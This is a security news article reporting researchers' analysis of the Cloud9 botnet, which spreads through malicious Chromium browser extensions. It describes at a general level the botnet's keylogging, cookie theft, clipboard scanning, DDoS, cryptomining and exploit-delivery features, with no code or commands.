Friday, November 1, 2024
HomeBotnetMalicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code

Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code

Published on

Malware protection

Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called ‘Cloud9’ that is intent on stealing the following information using malicious extensions:-

  • Online accounts credentials
  • Log keystrokes
  • Inject ads
  • Inject malicious JS code
  • Enroll the victim’s browser in DDoS attacks

This method is becoming increasingly attractive for malware developers to target web browsers as they contain the most valuable information about a user.

In the course of everyday activities, we can find out a lot about ourselves through our keystrokes or session cookies. A breach of security or a violation of privacy can be caused by having access to such information.

- Advertisement - SIEM as a Service

Cloud9 botnet is a RAT that affects all Chromium-based web browsers, which are popular among consumers like Chrome and Microsoft Edge. Moreover, threat actors could exploit this RAT to remotely execute arbitrary commands.

Technical Analysis

The official Chrome web store doesn’t host this malicious Chrome extension, so it cannot be downloaded from there. 

The distribution channel of this malware relies on communities that are operated by threat actors, wherein the malware will be hidden by users of the tool before it gets delivered to the victims by the tool itself.

In terms of the Javascript files that make up the extension, there are only three. While the primary functionality of the extension can be located in a file called “campaign.js” which contains most of its functionality.

According to the report, During the initialization of campaign.js, the window.navigator API is used to identify the system’s operating system. Once the target has been identified, a Javascript file is injected into the victim’s computer system as a method to mine cryptocurrency using the resources of the victim’s computer system.

Next, for further proceedings, it injects another script known as cthulhu.js which comprises a full-chain exploit for the following flaws:-

  • CVE-2019-11708 (Firefox)
  • CVE-2019-9810 (Firefox)
  • CVE-2014-6332 (Internet Explorer)
  • CVE-2016-0189 (Internet Explorer)
  • CVE-2016-7200 (Edge)

As soon as the vulnerabilities are exploited, Windows malware is automatically installed on the host machine and executed. This gives attackers even more opportunities to compromise systems and carry out even more severe malware attacks.

While one of the sophisticated inclusion of this malware is “Clipper,” a module that keeps scanning the clipboard of the system for copied data like:-

  • Passwords
  • Credit cards details

In addition to injecting ads into webpages silently, Cloud9 is also capable of generating revenue for its operators by generating ad impressions.

Cloud9 Botnet Functionalities

There are several key functionalities of this malware that can be abused by threat actors for malicious purposes, and here below we have mentioned all its functionalities:-

  • Send GET/POST requests, which can be used to get malicious resources.
  • CookieStealing, which can compromise user sessions.
  • Keylogging, which could be used to steal passwords among other things.
  • Layer 4 / Layer 7 hybrid attack, used to perform DDoS attacks from the victim’s PC.
  • OS and Browser detection, for next-stage payloads
  • Open Pop-unders, used to inject ads.
  • Execute JavaScript Code from other sources, used to inject more malicious code.
  • Silently load webpages, used to inject ads or to inject more malicious code.
  • Mine cryptocurrencies on the browser, to use the victim’s computer resources to mine cryptocurrency.
  • Send browser exploit, used to take control of the device by executing malicious code in the device.

As of right now, it is unknown how many victims have been affected by this incident. However, evidence indicates that the victims and attack scope of the malware is not limited since there is no specific web browser or country that is targeted by the malware.

Several of the C2 domains used in the recent campaign were also used in attacks launched by the Keksec malware group in the past, which suggests that the hackers behind Cloud9 have ties to them.

Managed DDoS Attack Protection for Applications – Download Free Guide

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

Notorious WrnRAT Delivered Mimic As Gambling Games

WrnRAT is a new malware attack that cybercriminals have deployed by using popular gambling...

Hardcoded Creds in Popular Apps Put Millions of Android and iOS Users at Risk

Recent analysis has revealed a concerning trend in mobile app security: Many popular apps...